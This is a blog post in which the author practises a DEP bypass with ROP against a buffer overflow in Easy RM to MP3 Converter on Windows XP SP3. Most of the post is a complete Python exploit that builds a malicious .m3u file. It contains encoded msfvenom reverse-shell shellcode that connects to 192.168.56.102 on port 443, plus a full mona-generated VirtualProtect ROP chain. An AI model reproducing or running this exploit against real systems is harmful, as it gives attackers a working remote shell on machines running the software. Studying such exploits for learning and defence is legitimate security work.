Written by SlidingWindow

Easy RM to MP3 Converter Buffer Overflow Vulnerability (DEP Bypass using ROP)

I wanted to learn and practice DEP bypass technique so I decided to try it on Easy RM to MP3 Converter version 2.7.3.700 (2006.09.29). I started off with a PoC and modified it for DEP bypass.

I tried it all manual first and could craft all of  the parameters required for VirtualProtect() successfully but then something went wrong inside VirtualProtect(). May be because EBP was misaligned.

I was running out of time so I decided to learn !mona rop, and spend some time fixing the rop_chain it created. And the result is here ;):

Screenshot 2019-11-30 at 10.21.29 PM

 

screenshot-2019-11-30-at-10.38.24-pm.png
Shellcode + Game Over!

Here’s the exploit code:

#!/usr/bin/env python
import struct


#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.102 LPORT=443 -e x86/alpha_mixed -f python > temp.txt
#Payload size: 710 bytes
#Run it and check the base address of the Shellcode, in my case it's 0x0010F80C

shellcode =  ""
shellcode += "\x89\xe5\xda\xcd\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x49\x78\x6c"
shellcode += "\x42\x37\x70\x55\x50\x67\x70\x35\x30\x6e\x69\x69\x75"
shellcode += "\x55\x61\x79\x50\x73\x54\x6c\x4b\x52\x70\x44\x70\x6c"
shellcode += "\x4b\x66\x32\x64\x4c\x6c\x4b\x61\x42\x64\x54\x4e\x6b"
shellcode += "\x74\x32\x61\x38\x34\x4f\x68\x37\x71\x5a\x64\x66\x76"
shellcode += "\x51\x6b\x4f\x6c\x6c\x57\x4c\x71\x71\x33\x4c\x54\x42"
shellcode += "\x66\x4c\x45\x70\x4a\x61\x38\x4f\x56\x6d\x56\x61\x69"
shellcode += "\x57\x49\x72\x79\x62\x52\x72\x76\x37\x6e\x6b\x56\x32"
shellcode += "\x62\x30\x6e\x6b\x31\x5a\x47\x4c\x6c\x4b\x72\x6c\x37"
shellcode += "\x61\x43\x48\x38\x63\x53\x78\x35\x51\x5a\x71\x62\x71"
shellcode += "\x4e\x6b\x73\x69\x57\x50\x67\x71\x78\x53\x6e\x6b\x37"
shellcode += "\x39\x77\x68\x6b\x53\x57\x4a\x72\x69\x4c\x4b\x54\x74"
shellcode += "\x6c\x4b\x47\x71\x78\x56\x35\x61\x59\x6f\x6c\x6c\x5a"
shellcode += "\x61\x4a\x6f\x74\x4d\x36\x61\x4f\x37\x67\x48\x79\x70"
shellcode += "\x30\x75\x4b\x46\x57\x73\x63\x4d\x5a\x58\x77\x4b\x53"
shellcode += "\x4d\x45\x74\x31\x65\x49\x74\x31\x48\x4c\x4b\x32\x78"
shellcode += "\x46\x44\x45\x51\x4e\x33\x33\x56\x6e\x6b\x44\x4c\x70"
shellcode += "\x4b\x4e\x6b\x46\x38\x65\x4c\x57\x71\x7a\x73\x4c\x4b"
shellcode += "\x64\x44\x4c\x4b\x46\x61\x6a\x70\x6d\x59\x50\x44\x67"
shellcode += "\x54\x76\x44\x61\x4b\x53\x6b\x75\x31\x31\x49\x71\x4a"
shellcode += "\x32\x71\x69\x6f\x6b\x50\x51\x4f\x31\x4f\x32\x7a\x4e"
shellcode += "\x6b\x72\x32\x4a\x4b\x6e\x6d\x33\x6d\x75\x38\x70\x33"
shellcode += "\x74\x72\x57\x70\x57\x70\x30\x68\x54\x37\x44\x33\x54"
shellcode += "\x72\x61\x4f\x42\x74\x73\x58\x70\x4c\x53\x47\x61\x36"
shellcode += "\x56\x67\x39\x6f\x4e\x35\x48\x38\x7a\x30\x33\x31\x35"
shellcode += "\x50\x65\x50\x37\x59\x69\x54\x73\x64\x32\x70\x35\x38"
shellcode += "\x67\x59\x4f\x70\x70\x6b\x55\x50\x59\x6f\x38\x55\x46"
shellcode += "\x30\x66\x30\x42\x70\x62\x70\x61\x50\x46\x30\x73\x70"
shellcode += "\x62\x70\x72\x48\x78\x6a\x56\x6f\x6b\x6f\x4b\x50\x79"
shellcode += "\x6f\x48\x55\x4e\x77\x52\x4a\x56\x65\x42\x48\x39\x50"
shellcode += "\x69\x38\x54\x78\x33\x56\x42\x48\x54\x42\x55\x50\x37"
shellcode += "\x71\x4d\x6b\x6f\x79\x58\x66\x62\x4a\x44\x50\x56\x36"
shellcode += "\x66\x37\x43\x58\x5a\x39\x4e\x45\x53\x44\x61\x71\x49"
shellcode += "\x6f\x59\x45\x4f\x75\x39\x50\x50\x74\x36\x6c\x49\x6f"
shellcode += "\x62\x6e\x36\x68\x52\x55\x4a\x4c\x71\x78\x4a\x50\x4f"
shellcode += "\x45\x39\x32\x56\x36\x49\x6f\x5a\x75\x52\x48\x62\x43"
shellcode += "\x72\x4d\x65\x34\x57\x70\x4b\x39\x4b\x53\x52\x77\x42"
shellcode += "\x77\x36\x37\x45\x61\x59\x66\x33\x5a\x52\x32\x51\x49"
shellcode += "\x70\x56\x6a\x42\x49\x6d\x71\x76\x69\x57\x33\x74\x54"
shellcode += "\x64\x55\x6c\x33\x31\x33\x31\x4e\x6d\x72\x64\x46\x44"
shellcode += "\x52\x30\x5a\x66\x67\x70\x63\x74\x72\x74\x46\x30\x52"
shellcode += "\x76\x76\x36\x43\x66\x42\x66\x72\x76\x72\x6e\x70\x56"
shellcode += "\x63\x66\x73\x63\x70\x56\x51\x78\x62\x59\x4a\x6c\x65"
shellcode += "\x6f\x6f\x76\x79\x6f\x79\x45\x6e\x69\x6b\x50\x70\x4e"
shellcode += "\x61\x46\x72\x66\x4b\x4f\x76\x50\x75\x38\x67\x78\x4b"
shellcode += "\x37\x75\x4d\x75\x30\x79\x6f\x4e\x35\x4d\x6b\x78\x70"
shellcode += "\x78\x35\x6c\x62\x56\x36\x70\x68\x6c\x66\x6d\x45\x6f"
shellcode += "\x4d\x4d\x4d\x6b\x4f\x69\x45\x47\x4c\x64\x46\x51\x6c"
shellcode += "\x44\x4a\x4f\x70\x49\x6b\x49\x70\x74\x35\x36\x65\x6f"
shellcode += "\x4b\x31\x57\x77\x63\x32\x52\x42\x4f\x71\x7a\x35\x50"
shellcode += "\x36\x33\x79\x6f\x39\x45\x41\x41"



def create_rop_chain():

  '''
   --- alternative chain ---
   EAX = ptr to &VirtualProtect()
   ECX = lpOldProtect (ptr to W address)
   EDX = NewProtect (0x40)
   EBX = dwSize
   ESP = lPAddress (automatic)
   EBP = POP (skip 4 bytes)
   ESI = ptr to JMP [EAX]
   EDI = ROP NOP (RETN)
   + place ptr to "jmp esp" on stack, below PUSHAD
  --------------------------------------------


  '''

  # rop chain generated with mona.py - www.corelan.be

  #This needed a little fix
  rop_gadgets = [
    #[---INFO:gadgets_to_set_esi:---]
    #0x00000000,  # [-] Unable to find API pointer -> eax,    EAX = ptr to &VirtualProtect()
    
    0x1002a21d,  # POP EAX # RETN    ** [MSRMfilter03.dll] **   |   {PAGE_EXECUTE_READ}
    0x7C801AD4,  # ptr to &VirtualProtect() [IAT msvcrt.dll],       for Widnows XP SP3
  
    #ESI = ptr to JMP [EAX]
    0x1001a788,  # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] 
    0x41414141,  # Filler (compensate for extra POP instruction)
    0x41414141,  # Filler (compensate for extra POP instruction)
    0x41414141,  # Filler (compensate for extra POP instruction)

    #[---INFO:gadgets_to_set_ebp:---]             , EBP = POP (skip 4 bytes)
    0x1002e79b,  # POP EBP # RETN [MSRMfilter03.dll] 
    0x1001b058,  # & push esp # ret  [MSRMfilter03.dll]
    
    #[---INFO:gadgets_to_set_ebx:---]     ,   EBX = dwSize which is 0x201
    0x10029822,  # POP EAX # RETN [MSRMfilter03.dll] 
    0x41f10201,  # put delta into eax (-> put 0x00000201 into ebx)
    0x10027682,  # ADD EAX,BE0F0000 # RETN [MSRMfilter03.dll] 
    0x1001bdee,  # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll] 
    0x41414141,  # (compensate for extra POP instruction)
    0x41414141,  # (compensate for extra POP instruction)

    #[---INFO:gadgets_to_set_edx:---],   EDX = NewProtect (0x40).  XOR EDX and then keep incrementing until it's 0x40
    #0x00000000,  # [-] Unable to find gadget to put 00000040 into edx
    0x77c576ec,  # XOR EDX,EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}    


    #[---INFO:gadgets_to_set_ecx:---]     ECX = lpOldProtect (ptr to a Writable address, whose memory protection setting needs to be changed)
    0x100241c3,  # POP ECX # RETN [MSRMfilter03.dll] 
    0x10064511,  # &Writable location [MSRMfilter03.dll]
    

    #[---INFO:gadgets_to_set_edi:---],        EDI = ROP NOP (RETN)
    0x1002bff9,  # POP EDI # RETN [MSRMfilter03.dll] 
    0x1001c121,  # RETN (ROP NOP) [MSRMfilter03.dll]
    

    #[---INFO:gadgets_to_set_eax:---]
    0x10029822,  # POP EAX # RETN [MSRMfilter03.dll] 
    0x90909090,  # nop
    

    #[---INFO:pushad:---]     , PUSH all of the GP registers onto stack to craft paramaters required for VirtualProtect()
    #0x00000000,  # [-] Unable to find pushad gadget
    0x77c12df9,  # PUSHAD # RETN [msvcrt.dll] 

  ]
  return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

  


def main():

  file = "rop.m3u"
  buffer_size = 26072   #Found by pattern_offset.rb
  nops = "\x90" * 240
  junk = "Z" * buffer_size
  eip = struct.pack('<I', 0x100102DC)        #0x100102DC -> Return to stack
  junk2 = "AAAA"    #Compenste, to make sure ESP points at first ROP gadget
  rest  = "C" * 292   #Trop_chain = create_rop_chain()his is to compensate for extra 8 bytes NOPsled added before rop2
  
  rop_chain = create_rop_chain()
  
  payload = junk + eip + junk2 + rop_chain + nops + shellcode + rest 
  print("\n[+]Payload size: ", len(payload))
  print("[+]Shellcode size: ", len(shellcode))


  with open(file, "w") as f:
    f.write(payload)
    f.flush()

  print("\n[+]ROP.m3u created successfully!")

if __name__ == '__main__':
  main()

 

2 thoughts on “Easy RM to MP3 Converter Buffer Overflow Vulnerability (DEP Bypass using ROP)

    1. @francesco, If I remember correctly, I created this rop chain by instructing Mona to use gadgets/instructions from MSRMfilter03.dll and MSVCRT.DLL. Also, I chose the Python one that uses VirtualProtect().

      I did it on Windows XP SP3 and it may look a bit different on other versions of Windows. Is your ROP chain not working?

      Like

      Reply

Leave a reply to SlidingWindow Cancel reply